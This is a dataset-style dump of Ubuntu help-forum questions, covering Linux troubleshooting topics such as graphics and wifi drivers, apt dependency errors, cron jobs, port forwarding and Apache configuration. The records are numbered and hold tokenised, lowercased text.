horizsync 31.0-82.0 vertrefresh 55.0-85.0 endsection section `` screen '' identifier `` default screen '' monitor `` nec lcd1850e '' device `` configured video device '' subsection `` display '' depth 24 modes `` 1280x1024 '' `` 1280x960 '' `` 1024x768 '' `` 800x600 '' `` 848x480 '' `` 640x480 '' endsubsection endsection
513197	laptop , unable to install discrete graphics card gtx 880m	so i 've bought the gt70 2pe dominator pro a few weeks ago and i installed zorin os 9 ultimate on it . today i tried to install the nvidia drivers on my laptop since it has the gtx 880m , but my system became unbootable . can anyone help me with this issue ? i will write down what i 've tried so far . this is what i 've tried so far : downloaded the newest nvidia drivers from their website . pressed ctrl+alt+f2 to open the terminal page thingy . logged in and got root access . stopped the lightdm service . ran the nvidia-linux-x86_64-340.32.run installer . pressed the accept button and right after that it told me the following message : the distribution-provided pre-install script failed ! continue installation anyway ? . when i install anyway , it will crash my system and makes it unbootable , does anyone know how to use my gtx 880m ? do i need to enable it on boot time somehow ? thanks for the support , sapphire ~
513200	finding code and documentation	/usr/share/doc/gnome-calculator consists of three file/folder changelog.debian.gz copyright and n**ewz.gz** but i did n't find the source code . does n't the source code lie within the documentation ? where can i get its source code of all the application of ubuntu ? is it documented within my system or in internet ?
513201	canon pixma 432 network scanner	i have a problem with a canon pixma mx432 printer/scanner . i just removed windows 7 and installed ubuntu 14.04 8/17/2014 on an older desktop that i built ( the computer is an amd build with an asus motherboard ) . the printer/scanner is an all-in-one unit that is networked in my house via wifi . all of the computers in my house can access this printer/scanner . my macbook , my wife 's windows 8 laptop , and my kids mini ipads . i am giving linux a test-drive with some success as far as setting devices up . but , for the life of me i can not figure out my scanner issue . if anyone can help i would appreciate it . make/model : canon pixma mx432 ppd driver : i have no idea how to get this info . supported ? : no , from the information i gather from old forum posts . works ? : the printer works via wifi perfectly , but not the scanner . the simple scan program sees the scanner , but produces an error when i attempt to scan . i also tried xsane , but that program does not even detect the scanner . note : the printer is working off of an ubuntu driver and not a canon driver . linux version : ubuntu 14.04 i tried the steps in this post , downloaded the `` scangearmp-mx430series-1.90-1-deb.tar.gz '' file , but could not get the scanner to work . http : //ubuntuforums.org/archive/index.php/t-2096430.html any suggestions ?
513204	curl blocked at tmg firewall	i 'm using tmg ( threat management gateway ) firewall at my web server . when i try to use curl from outside , the firewall blocked the connection . what rule/setting do i need to create at tmg to allow it . the error looks like this : < li id=l_defaultr_8 > < b > refresh page : < /b > search for the page again by clicking the refresh button . the timeout may have occurred due to internet congestion . < li id=l_defaultr_9 > < b > check spelling : < /b > check that you typed the web page address correctly . the address may have been mistyped . < li id=l_defaultr_10 > < b > access from a link : < /b > if there is a link to the page you are looking for , try accessing the page from that link . < /ul > < hr color= # c0c0c0 noshade > < p id=l_defaultr_11 > technical information ( for support personnel ) < /p > < ul > < li id=l_defaultr_12 > error code : 403 forbidden . the server denied the specified uniform resource locator ( url ) . contact the server administrator . ( 12202 )
513206	how to get out of dependency hell	i am doing this from memory from work . basically , i have libjpeg-turbo8 installed . but i have libjpeg-turbo8 : i386 installed at version xxx4.4 and libjpeg-turbo8 : amd64 installed at version xxx4.3 . i am not sure how this mismatch happened . i believe that 4.3 is the right version , so i would like to roll the 32 bit version back . apt-get install libjpeg-turbo8 : i386xxxxxx4.3 did not work ( as it was still complaining that it couldnt do anything because of the mismatch ) . basically , i cant do anything with apt-get because this mismatch is causing dependency hell . what is the proper way to resolve this . the box is 64 bit 12.04 . edit : sudo aptitude -f install pops the same error .
513207	ubuntu 14.04 sunpinyin entry not appearing	i have ubuntu 14.04 and after some messing around i finally managed to get the default ibus-pinyin working . however , i have no idea how that works , it does n't seem to accept regular hanyu pinyin . i want to try out sunpinyin , and i have ibus-sunpinyin installed . however , under text entry settings , i ca n't find sunpinyin under the input sources . how do i add it as an input source ? thanks !
513208	how do i start the textual ( non-graphical ) installer ?	i 'm using the desktop version of ubuntu . as soon as the installer starts , i type the escape key which reveals the f1-f6 options . tying escape again gives this dialog : ** '' you are leaving the graphical boot menu and starting the text mode interface . `` ** i select `` ok '' , but the installer reboots ... back into the graphical interface : ( how do i start the text mode installer interface ?
513209	minecraft server in ubuntu	again . i have issues while trying to launch a minecraft server . not the server itself , but i ca n't let other people join . i , myself can only connect with `` localhost . '' i ca n't connect with my external i.p . address . can anyone point me in the right direction to allow connecting to my server from my external i.p ? thanks .
513213	ip/port forward requests to another server	i have the following listening port : ip set up on my ubuntu server . 12.345.67.890:3636 it receives requests perfectly , however , i would now like to forward any requests to that ip : port to another ip : port , i.e . : 09.876.54.321:3636 essentially i want to do a request forward 12.345.67.890:3636 - > 09.876.54.321:3636 . how can i go about it in terminal and if i wanted to change it back how can i go about that too ? is there also a way to test that the data is forwarding and it is setup properly ? thanks ! edit : can i just do as follows , just wondering how i would go about testing it and how i could disable it ? sysctl net.ipv4.ip_forward=1 iptables -t nat -a prerouting -p tcp -- dport 3636 -j dnat -- to-destination 09.876.54.321:3636 iptables -t nat -a postrouting -j masquerade
513214	is there a way to upgrade directly from ubuntu 12.04 to ubuntu 14.04 ?	i am running ubuntu 12.04 , and it will not allow me to upgrade but just keeps on giving me more updates . is there a way to upgrade directly from ubuntu 12.04 to ubuntu 14.04 ? i got third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager .
513217	issures with toshiba satellite c55-a5105 laptop	to began , with nothing was working out of the box other than the usb , and the ethernet port . until i fix the wireless internet , and the touch pad . if you want to know more than please see the comments on this answer . and i did install intel gpu drivers . but the fn keys are not working other than the audio ones . the monitor is lock on one brightness setting , but there is no way to change it , i try though the settings and though the fn keys ... similarly , the touch-pad en/disabler key does n't work and same for the wireless .
513219	airtel 3g datacard in ubuntu 14.04	with my airtel 3g datacard ( huawei ) i am not able to connect to internet ... .operating system is ubuntu 14.04 lts i will be glad if someone helps me out with this
513220	can i install ubuntu in macbook air early 2014	can someone help me with the steps for installing ubuntu on my macbook air early 2014 . appreciate your help .
513224	dual boot problem , window 7 and ubuntu 12.04 while installing	i am trying to install ubuntu 12.04 alongside with my windows 7 , but while installing ubuntu 12.04 , at time of partition i do n't see `` install ubuntu alongside with windows 7 '' option , i only see my entire hdd 500gb please help..
513226	ubuntu , browser can surf the internet , but i can not ping	i am using ubuntu.i can use firefox in it to surf the internet properly , like google and any other websites.but i can not use ping command .for example , when i `` ping www.google.com.hk '' , it get no response . when i ping ip directly , result is the same . my ifconfig output is : my ufw is inactive . anyone can tell me the problem ?
513227	package : astrolog is n't available on ubuntu repository ?	https : //help.ubuntu.com/community/astrology says : astrolog is available on ubuntu repository : but it is not located/available : $ sudo apt-get install astrolog reading package lists ... done building dependency tree reading state information ... done e : unable to locate package astrolog also i ca n't find astrolog from ubuntu repository : searched at : ubuntu packages searched at : ubuntu updates searched at : launchpad so , why it is not available ?
513229	config test failed when restarting apache	when i tried to restart apache2 i got the following error . * restarting web server apache2 [ fail ] * the apache2 configtest failed . output of config test was : ah00526 : syntax error on line 14 of /etc/apache2/conf-enabled/httpd.conf : either all options must start with + or - , or no option may . action 'configtest ' failed . the apache error log may have more information . the contents of httpd.conf is as follows . < directory `` /var/www '' > # # possible values for the options directive are `` none '' , `` all '' , # or any combination of : # indexes includes followsymlinks symlinksifownermatch execcgi multiviews # # note that `` multiviews '' must be named *explicitly* -- - `` options all '' # does n't give it to you . # # the options directive is both complicated and important . please see # http : //httpd.apache.org/docs/2.2/mod/core.html # options # for more information . # options indexes multiviews +followsymlinks # # allowoverride controls what directives may be placed in .htaccess files . # it can be `` all '' , `` none '' , or any combination of the keywords : # options fileinfo authconfig limit # allowoverride all # # controls who can get stuff from this server . # order allow , deny allow from all < /directory > what went wrong ?
513231	ca n't boot server after attempting to upgrade 12.04 to 14.04	i have a rackspace cloud server ( that was ) running 12.04 lts . the other day , after logging in and doing some routine maintenance , i noticed the server telling me that 14.04 lts was available , and to install it , all i had to do was run 'do-release-upgrade ' . that sounds easy ! so , being tired , and not really on top of my game , i decided to give it a whirl . i do n't want to be left behind , after all . well , oops . that probably was n't such a good idea after all . after the upgrade , the last step is of course , to reboot . the server would not reboot . i went into rescue mode ( a rackspace service that allows you to mount the filesystem using another os ) - so i can get access to the server 's file system . i think that i need to either edit my /boot/grub/menu.lst file or my /etc/fstab file , or both ? or should i be sniffing around some completely other area ? i do n't have a lot of experience working with boot loaders and such , so i am hoping someone is willing to help out with any tips or advice .
513232	alt+~ shows all instances of an app opened in different virtual desktop / workspace	with latest unity 5.20.0 on 12.04 , following behavior is seen . two app instances are open in desktop-1 , another two instance in desktop-2 . if i used one terminal of desktop-1 and switched desktop to desktop-2 and start using instance there ; 1/ when i do alt+tab it moves back to desktop-1 terminal and desktop also switches . is there a way to keep alt+tab local to virtual desktop i am into ? 2/ in any desktop when i do alt+ ~ it shows app instances from all the desktops . is there a way to keep alt+ ~ show only instances from that virtual desktop ?
513233	why the same .sh does not work with 2 different users executing it ?	i have rwo users user1 and user2 . i have this script1.sh inside user2 home folder : # ! /bin/bash cd /home/user1 & & ./script2.sh that calls script2.sh : # ! /bin/bash if [ 2 > 1 ] ; then echo true ! . else echo not true ! fi now , when i execute script1 using user1 , everything works . when i execute with user2 i get this error : ./script2.sh : line 3 : 1 : permission denied saying i can't.. if ? if i write everything on the terminal , it also works . so my permissions : -rwxrwxr-x 1 user2 group_with_both_users 149 ago 19 02:41 script2.sh -rwxr-xr-x 1 user2 group_with_both_users 60 ago 19 01:38 script1.sh i really have no clue of what is going on .
513234	how to compile a linux kernel ?	how do i compile a linux kernel and how do i use the output file generated ?
513237	fresh install no drivers	fresh noob here , i installed ubuntu 13.10 on my laptop ( acer aspire e1 572g ) i installed over my win 8.1 partition i just erased the disc but while doing so i had control over my mouse and was able to connect to the wireless via the wireless symbol on the top right of the screen . i think i wiped any drivers that were there though , i did the initial install in work and while doing so i was called out of the office on a job and then when i got back i saw a message saying , the system is running in low graphics mode your screen , graphics card and , input device settings could not be detected correctly . you will need to configure these yourself . is there a way i can configure them ? if anyone can help i would be very grateful , thanks in advance !
513239	package download problem	whenever i try to install the vim package the following error appears . what should i do ? failed to fetch http : //dk.archive.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_7.3.547-4ubuntu1.1_all.deb 404 not found failed to fetch http : //dk.archive.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.3.547-4ubuntu1.1_i386.deb 404 not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
513246	matlab installation on ubuntu 12.04	how to install matlab in ubuntu 12.04 ? which version of matlab is best suited to ubuntu 12.04 ?
513248	why does usb formatted ntfs in ubuntu work on windows 7/8 but not xp ?	i formatted my usb drive in ubuntu 's disk utility . when i plug that usb into my pc which has windows xp on it , it shows the drive as corrupted . that same usb works on windows 7 and 8 , just not with windows xp . how can this be fixed ?
513249	openssl not picking up cas in certs folder by default	on ubuntu 12.04 lts , i am getting error for certificate validation error if the capath is not explicitly set tried several solution . but nothing works . it is causing so much of issue to install new packages on my system ( tried at least on two system ) successful command : openssl s_client -connect secure.ogone.com:443 -showcerts -capath /etc/ssl/certs/ success with verify return code : 0 ( ok ) unsuccessful command openssl s_client -connect secure.ogone.com:443 -showcerts failed with verify return code : 20 ( unable to get local issuer certificate ) i tried following solution based on the wiki responses but it is also not working openssl x509 -noout -hash -in /etc/ssl/certs/geotrust_global_ca.pem 2c543cd1 openssl x509 -noout -subject_hash_old -in /etc/ssl/certs/geotrust_global_ca.pem 7999be0d openssl x509 -noout -subject_hash -in /etc/ssl/certs/geotrust_global_ca.pem 2c543cd1 i can see the difference in hash values i tried adding a script to create symbolic link with -subject_hash_old and -subject_hash . but the problem continues to happen and i get the error code verify return code : 20 ( unable to get local issuer certificate ) . # ! /bin/sh create following script to create symbolic links in /etc/ssl/certs link with subject_hash_old and subject_hash is successfully created for file in /etc/ssl/certs/*.pem do hasholdsub=`openssl x509 -noout -subject_hash_old -in $ file` hashsub=`openssl x509 -noout -subject_hash -in $ file` echo $ hasholdsub $ hashsub ln -s $ file $ hasholdsub.0 ln -s $ file $ hashsub.0 cat $ file > > ca-certificats-gen.crt done but this problem is still existing please help to resolve the issue .
513251	ubuntu screen brightness setting not affect in acer aspire4750g	i have acer 4750g with ubuntu 14.04 and the screen brightness is not affect to screen ( not decreasing the brigthness ) . my vga is nvdia geforce gt 540m , is that possible to decrease screen brightness ? how ?
513256	configure command not found	i was trying to compile some library . from inside the library source directory when i wrote sudo ./configure it says configure command not found but if i write sudo /bin/bash ./configure it works . why ? how not to give the /bin/bash part ?
513257	change standard display order	i 'm using an additional display that stands to the left of my laptop . ubuntu recognizes the display , putting the display screen to the right . in the display settings i 've changed the display order so that the additional display is on the correct side . but after every reboot , ubuntu changes the display order again . how can i save my display order permanently ?
513259	how to make a shared folder from host to windows guest	host - ubuntu 14.04 guest - windows 8 i have set up shared folder called `` share '' at /home/username/share but in windows guest i can not find that shared folder under network . what i am doing wrong ? also my bidirectional clipboard does n't work , ca n't copy . any help would be appreciated .
513260	how to install 64-bit .deb file on a 32-bit machine	i have ubuntu 14.04 . i recently downloaded viber . the viber .deb file has 64-bit architecture . i want to install it on my computer , but my computer only supports 32-bit . the output of running lscpu is as follows : architecture : i686 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 2 on-line cpu ( s ) list : 0,1 thread ( s ) per core : 1 core ( s ) per socket : 2 socket ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 23 stepping : 10 cpu mhz : 2800.000 bogomips : 5586.12 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 2048k
513264	downloading from repository	please i am new to usrp and ubuntu , i want to try out some the projects from cgran precisely , i want to try out `` two-way relaying with network coding '' but to start with i do n't even know how to get the file from the repository . please is there any command to fetch the file from my terminal . the link of the file i want to fetch is https : //www.cgran.org/browser/projects/relaying_schemes_implementation thanks in anticipation for your help
513266	try 'apt-get -f install ' with no packages	i am using ubuntu 14.04 lts os . so when i go to installed mysql server using below command sudo apt-get install mysql-server i have some error message . this is the error message : reading package lists ... done building dependency tree reading state information ... done mysql-server is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mysql-server : depends : mysql-server-5.5 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how i solve this error ?
513267	wifi trouble shooting	i 'm quite new to linux . i am currently using ubuntu on my hp celeron laptop . i 've been having trouble with my wifi on my laptop . i 've tried pressing the button to activate my wifi but it does n't seem to be responding . so , i 'm trying to run this troubleshooting command : sudo lshw -c network but when i try and press enter , it asks for a sudo password . first of all , what is it ? secondly , where do i get it ? i 'd really appreciate some help . i need to get back on the network at work asap . thanks .
513270	segmentation fault ( core dumped ) in ubuntu 12.04	i have a problem with my system when i run my executable file named bina like following : bayat @ bayat : ~/bina/stadaq $ ./bina -s johan.sys segmentation fault ( core dumped ) what does `` segmentation fault '' means ? and how is possible to fix it ? bina is result of following makefile : cc = gcc cflags = -c -wall ld = gcc csrcs = online_ana.c fppdaq.c sentevent2root.c bina_unpack.c tcpip.c objs = $ ( csrcs : .c=.o ) inclds = -i . -i../cdaq -i../elec_lib -i../common defs = -dlinux86 -danalysis -dosf1 libs = -lpthread -lg2c -lcrypt -ldl -lm -lnsl cdaqlib = ../cdaq/debug.a ../elec_lib/elec.a bina : $ ( objs ) $ ( ld ) $ ( objs ) -o $ @ $ ( cdaqlib ) $ ( libs ) .c.o : $ ( cc ) $ ( cflags ) $ ( defs ) $ ( inclds ) $ < clean : rm -f *.o *~ core ./bina
513272	running tomcat without netbeans in ubuntu 12.04	i 've installed netbeans 7.4 , and selected the option to install tomcat 7.0.41 together with it . i 've always run my tomcat server through netbeans by running the project . is there a way to run the tomcat server without netbeans ? do i have to install another version of tomcat using apt-get so that it can be run as a service ?
513273	cakephp does not work in ubuntu 14.04	i have installed cakephp v2.4.6 in ubuntu 14.04 ( 64 bit ) and database is postgresql . the same system works fine in windows environment but after i transfer it into ubuntu , it shows some issues . 1 ) the css does not work . no color and the login screen alignment change . 2 ) after login , an error says `` the requested url was not found in the server '' came . some forum ask us to change the config file in `` /etc/apache2/sites-available/default.conf '' . but i could not find any default.conf file . please guide . thank you .
513274	how to automatically initialize hdmi audio output	every time i connect my 64 bit ubuntu 14.04 laptop to the tv via hdmi , i have to run a bash command to make the hdmi audio output option visible in system settings - > sound : speaker-test -c 2 -r 48000 -d hw:0,3 is there some setting to have this option be visible automatically when i connect via hdmi ?
513276	ubuntu 14.04lts live dvd halfway laptop hanging	i try to boot ubuntu 14.04 lts 32-bit live dvd bios shows up , booting ubuntu starts then teher is a white screen and no user interaction possible ( for example ctrl+alt+del , no reaction ) . the cursor also is not moving my laptop lenovo 2005 model ti any 100 , ram 512 mb .thanks
513278	how to run a shell script again and again having x interval of time in root ?	i have a shell script in my ubuntu server 14.04 lts at ./shellscript.sh . i setup /etc/rc.local to run the shell script after boot but before login using below code . to run run it boot write this command in terminal : sudo nano /etc/rc.local then add following and save . # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . # ! /bin/bash ./shellscript.sh exit 0 note : keep in mind that i am working in root mode . now when i run crontab -e then i got the following . now what to do ? no crontab for root - using an empty one select an editor . to change later , run 'select-editor ' . 1 . /bin/ed 2 . /bin/nano < -- -- easiest 3 . /usr/bin/vim.basic 4 . /usr/bin/vim.tiny choose 1-4 [ 2 ] : after selecting 2 , i got crontab : `` /usr/bin/sensible-editor '' exited with status 2 now i want to run/execute this shell script again and again having 15min of time interval between every run after boot but before login . so can i do it ? answer : first of all , you ca n't access crontab -e via root . you have to login via user account . after login in user account , go to terminal and type crontab -e here you will get some text like below . # edit this file to introduce tasks to be run by cron . # # each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # to define the time you can provide concrete values for # minute ( m ) , hour ( h ) , day of month ( dom ) , month ( mon ) , # and day of week ( dow ) or use '* ' in these fields ( for 'any ' ) . # # notice that tasks will be started based on the cron 's system # daemon 's notion of time and timezones . # # output of the crontab jobs ( including errors ) is sent through # email to the user the crontab file belongs to ( unless redirected ) . # # for example , you can run a backup of all your user accounts # at 5 a.m every week with : # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # for more information see the manual pages of crontab ( 5 ) and cron ( 8 ) # # m h dom mon dow command now i=in the end of file , you have to add */15 * * * * /shellscript.sh line to run your script each after 15 min . now save the file and its done . note : if you want different timing of interval to run script again and again then do n't get confused . here are some online tools that will generate cron lines for you . http : //www.cronmaker.com/ http : //crontab-generator.org/ http : //www.generateit.net/cron-job/ http : //cron.nmonitoring.com/cron-generator.html http : //www.openjs.com/scripts/jslibrary/demos/crontab.php
513280	compute folder size for a given file extension only	i have a folder containing all my php projects , i 'd like a command that would output the folder size of each project but only for the *.php files inside it . ideally the output would be something like this : project1 7,0m project2 13,3m ...
513284	fujitsu/siemens amilo pi 1505 touchpad drivers	i 'm trying to revive a pretty old fujitsu laptop , i installed lubuntu and it finally stopped lagging , and is working pretty well now . i 'm new to linux , and i do n't know much , i do n't even know how to take ss , so i 'll just paste what it says for my input devices : kompjuter @ amilo-pi-1505 : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 logitech wheel mouse id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] does anyone know how can i get drivers for this touchpad ? browsing the web without two finger scrolling or edge scrolling is quite frustrating . i tried several solutions i found on these forums , but non of those worked ( installing `` pointing devices '' in preferances , adding mouse.fdi file and few other methods ) . thanks in advance & sorry for my bad english !
513288	can i hide the mnemonics in qt applications ?	using stock ubuntu . the underscores in the menus make these apps ( skype , to a lesser degree vlc etc . ) look out of place and ( imo ) ugly .
513289	function keys not working on toshiba c-50-b	i purchased a toshiba c-50-b-p-0010 about a week back , it did not come pre-installed with any os . i have installed ubuntu 14.04 . the function keys are not responding properly . if i press f3 which is for brightness , it put the laptop to sleep ! i have tried all the solutions suggested in the following link . one difference i observed after following all the suggestions is that i can change my brightness through my system settings . but the function keys are still not working as they should be . touch pad on/off is also not responding . brightness control does n't seem to work on a toshiba satellite m115 laptop i 'm not very good at using the terminal , so please give detailed suggestions . one of the suggestions is to update my bios , but the toshiba india website drivers page does n't have any bios for this model .
513290	failling install ralink rt5592 driver on ubuntu 14.04 lts	my problem concerns the installation of a wi-fi driver ( rt5592 ) for my new wi-fi adapter ( pce-n53 ) on my newly built computer . basically , i do n't manage to get the driver installed and therefore i can not get the wifi to work . i know i am not the only one having this issue this year , between rt5592 driver and ubuntu 14.04 lts , in one way or the other . is there anybody who has ever been able to fix this problem ? it does not look like on all the posts i have been through ... following an answer to a same problem as mine ( i was getting the same error message as christopher kyle horton of `` incompatible types '' etc ) , i have applied the instructions and done the editings in a script as suggested by paul b . unfortunately i still do get error/warnings message ( a different one this time ) at the end of the make and the wi-fi still does not work . below is a snapshot of the end of the message : in file included from /home/username/downloads/pce-n53/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/include/os/rt_linux.h:31:0 , from /home/username/downloads/pce-n53/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/include/rtmp_os.h:44 , from /home/username/downloads/pce-n53/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/include/rtmp_comm.h:69 , from /home/username/downloads/pce-n53/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:31 : include/linux/module.h:88:32 : error : ‘__mod_pci_device_table’ aliased to undefined symbol ‘rt2860_pci_tbl’ extern const struct gtype # # _id __mod_ # # gtype # # _table \ ^ include/linux/module.h:146:3 : note : in expansion of macro ‘module_generic_table’ module_generic_table ( type # # _device , name ) ^ /home/username/downloads/pce-n53/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:73:1 : note : in expansion of macro ‘module_device_table’ module_device_table ( pci , rt2860_pci_tbl ) ; ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/username/downloads/pce-n53/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.o ] error 1 make [ 1 ] : *** [ _module_/home/username/downloads/pce-n53/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-32-generic' make : *** [ linux ] error 2 the full pastebin data : paste.ubuntu.com/8088834/ it looks from the message that one would need to edit manually some of/other scripts in the driver package , as did paul b suggest in one case . but i have no idea how to do that . here is the driver package of the wifi adapter : www.asus.com/uk/networking/pcen53/helpdesk_download/ my system is as following : os : ubuntu 14.04 lts wi-fi card : asus pce-n53 motherboard : asus kcma-d8 processor : amd opteron 4228 he kernel : 3.13.0-32-generic following this info from chili555 in here , below are some extra info about my system : lspci -nn | grep 0280 gives 04:00.0 network controller [ 0280 ] : ralink corp. rt5592 pci2 wireless network adapater [ 1814:5592 ] and sudo apt-get install linux-headers-generic returns linux-headers-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . if this is a kernel version ( i have 3.13.0-32-generic ) incompatibility issue with the driver as chilli555 suggests ( the readme file in the driver package says indeed it is compatible with kernel 2.6 ) , how could one trick this around to make it work ? that should be possible right ? on ubuntu forums , the patches proposed dont work ( leads the computer to freeze ) . basically : is there anybody out there who has ever been able to make a pce-n53 work on ubuntu 14.04 lts ( kernel 3.13 ) ? how shall i edit the driver package to make it work for my kernel ?
513291	mencoder install on ubuntu	i am writing this after checking almost all the posts but none of those solved my problem . i am trying to install mencoder to process some videos but there are strange errors coming . for examples when i try sudo apt-get install mencoder the following errors comes out : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mencoder : depends : mplayer depends : libasound2 ( > 1.0.24.1 ) depends : libavcodec53 ( > = 4:0.8~beta2-2 ) but it is not installable or libavcodec-extra-53 ( > = 4:0.8~beta2-2 ) but it is not going to be installed depends : libavformat53 ( > = 4:0.8~beta2-2 ) but it is not installable or libavformat-extra-53 ( > = 4:0.8~beta2-2 ) but it is not going to be installed depends : libcdparanoia0 ( > = 3.10.2+debian ) but it is not installable depends : libenca0 ( > = 1.9 ) but it is not installable depends : libfontconfig1 ( > = 2.8.0 ) but it is not installable depends : libgif4 ( > = 4.1.4 ) but it is not installable depends : libjpeg8 ( > = 8c ) but it is not installable depends : liblzo2-2 but it is not installable depends : libsmbclient ( > = 3.0.24 ) but it is not installable depends : libspeex1 ( > = 1.2~beta3-1 ) but it is not installable depends : libtheora0 ( > = 1.0 ) but it is not installable e : unable to correct problems , you have held broken packages . can anyone help to solve this issue . i tried to find static builds of mencoder but could not .
513292	how to : persistent ubuntu over tftp	i am currently booting my ubuntu successfully over tftp . i can also save the current state due to a casper filesystem on my usb-stick . but i want to make my live cd persistent over tftp . i have added to my boot-string the keyword `` persistent '' and it is working , but just for usb . does anybody have a suggestion why it does n't recognize my casper-rw file on the hard drive of my server ? thanks in advance !
513294	why i ca n't add redshift to startup ?	recently , i have discovery redshift ( help your eyes hurt less if you are working in front of the screen at night ) i can run the tools using command line : redshift-gtk i run `` startup manager '' : and i have add an entry : and when i restart my computer , redshift does not start when i start my computer
513296	ubuntu 14.04 - google chrome is not showing window	just installed google chrome from deb it is in the launcher but when i click it - there is no visible window for it i tried reinstalling through apt-get - no luck i started it from terminal 'google-chrome ' - window is still not showing anyone has a fix ?
513297	updating to ubuntu 14.4	i have tried to install ubuntu 14.04 by downloading from ubuntu.com but i am not able to write that in any dvd so i tried with pendrive by making it as bootable device by using yumi software and also with startup disk creator which is in ubuntu 12.4 but i am not able to install through any external media share the solutions to solve this problem .
513298	how to concatenate two strings in shell script in 3.13.0-34-generic kernel	i want to concatenate two strings for the shell file im getting error when i have created the shell file in following manner could you please suggest how to get it set export app_home= '' /home/xxxxxxxx/archivaldaemon '' export java_home= '' /usr/lib/jvm/java-7-oracle/jre '' export libpath= '' /home/xxxxxxxx/archivaldaemon/lib '' export cpath= $ app_home/conf export cpath= $ cpath : $ libpath/commons-beanutils-core-1.7.0.jar export cpath= $ cpath : $ libpath/commons-collections-3.2.jar export cpath= $ cpath : $ libpath/commons-io-1.4.jar export cpath= $ cpath : $ libpath/commons-lang.jar export cpath= $ cpath : $ libpath/commons-net.jar export cpath= $ cpath : $ libpath/dataloader-27.0.1-uber.jar export cpath= $ cpath : $ libpath/dom4j-1.6.1.jar export cpath= $ cpath : $ libpath/log4j-1.2.15.jar export cpath= $ cpath : $ libpath/opencsv2.3.jar export cpath= $ cpath : $ libpath/poi-3.7.jar export cpath= $ cpath : $ libpath/poi-ooxml-3.7.jar export cpath= $ cpath : $ libpath/poi-ooxml-schemas-3.7.jar export cpath= $ cpath : $ libpath/wsc-23-min.jar export cpath= $ cpath : $ libpath/xmlbeans-2.5.0.jar export cpath= $ cpath : $ libpath/archival-daemon-main.jar export cpath= $ cpath : $ libpath/sbmclasspath.jar export cpath= $ cpath java -xms256m -xmx512m -classpath $ cpath `` -dfile.encoding=utf-8 '' xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxr echo $ cpath
513299	what is supposed to happen when you install gmail webapp ?	i have installed gmail ( and other google as well ) webapps into ubuntu 14.04 64-bit . after that i rebooted the system hoping that webapps will integrate into the system . but after logging back to the system , i see no changes . if i click on email envelope ( top bar ) , i do n't see my inbox . also if i try to search email in dash via gmail keyword , nothing happens as well . am i using this wrongly or webapps do n't work ? what was supposed to happen when i install webapps ? note : i did start the gmail app from dash and logged in edit i added imap account as well , but no email coming from it .
513300	no wireless connection in menu bar	so i recently added ubuntu to my samsung chromebook . i used the steps shown on cnnetwork . i ca n't open software center because i have no wireless connection in my menu bar . i tried alt+f2 and entering nm-applet and nothing happens . can someone give me an extremely basic step by step instruction on how to fix this ? thanks in advance
513304	sound over multiple xservers	i 'm currently using multiple x-server displays . is it possible to share the sound which all the programs generate ( through pulseaudio ) over all displays ? so for example i have a music program on display 1 and i want to hear it when i 'm on display 0 . perhaps one way would be to do a multicast with pulseaudio , but is there a simpler approach ?
513306	is it possible to run a vm on 64 bit host imported from a 32 bits host ?	goal : export and import an ubuntu vm original system : -host machine ( windows 7 32 bits ) -virtualization sysem ( virtualbox ) new system : -host machine ( ubuntu 14.04 , 64 bits ) -virtualization sysem ( virtualbox ) question : could the vm run on a 64 bits host when moving it from a 32 bits host ?
513308	changing the brightness on the lenovo t410	i ca n't change the brightness on my lenovo t410 laptop . i tried changing it from the system settings and using fn+home , but both did n't work .
513312	how to recover shift+delete files	i just shift-deleted some files from folder which has .avl file extension . is there any way that i can recover my files ?
513315	upgrade to 14.04 lost wi fi	i updated yesterday to 14.04 . ( just said yes to upgrade offer and let it roll ) now the wi fi icon on my hp elitebook stays stubbornly red . i can connect with ethernet cable ok. any suggestions ?
